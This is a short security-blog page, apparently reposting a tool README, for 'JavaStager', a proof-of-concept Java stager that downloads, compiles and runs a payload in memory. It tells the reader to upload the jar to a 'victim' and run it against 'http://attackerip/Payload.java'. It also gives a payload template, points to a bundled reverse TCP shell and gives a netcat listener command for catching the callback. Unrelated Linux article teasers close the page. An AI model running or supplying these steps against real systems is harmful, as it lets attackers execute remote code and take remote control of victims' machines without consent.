A PoC Java-Stager which can download, compile, and execute a Java file in memory.
The key parts of the talk for me are:
Also Read theZoo – A Repository Of LIVE Malwares For Your Own Joy & Pleasure
The output in NetBeans Included a line like this:
Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar
To work on your victim you must upload the “JavaStager*.jar” file and the “lib” folder containing Janino from the “target” folder.
The following command will execute the stager:
java -jar JavaStager-0.1-initial.jar
You will be prompted with the usage as shown:
Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>
The “url” is the only parameter that is passed to Stager. An example usage would be:
java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java
Your payload must be in a file called “Payload.java” and your exploit code must be in a static method called “Run”. The following shows the template if you want to write your own:
public class Payload {
public static void Run() {
// Your code here
}
}
I have provided an example Reverse TCP payload in the file “TCPReverseShell.java”. To prevent name clashes this is not called “Payload.java” and the class name is wrong. The header comment in “TCPReverseShell.java” explains how to modify it to work.
You will need to host your “Payload.java” file on an HTTP server. The attacker will need to start a netcat listener to catch the connection back using the standard nc -lvp 8044 technique.
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…
Vim and Vi are among the most powerful text editors in the Linux world. They…
Working with compressed files is a common task for any Linux user. Whether you are…
In the digital era, an email address can reveal much more than just a contact…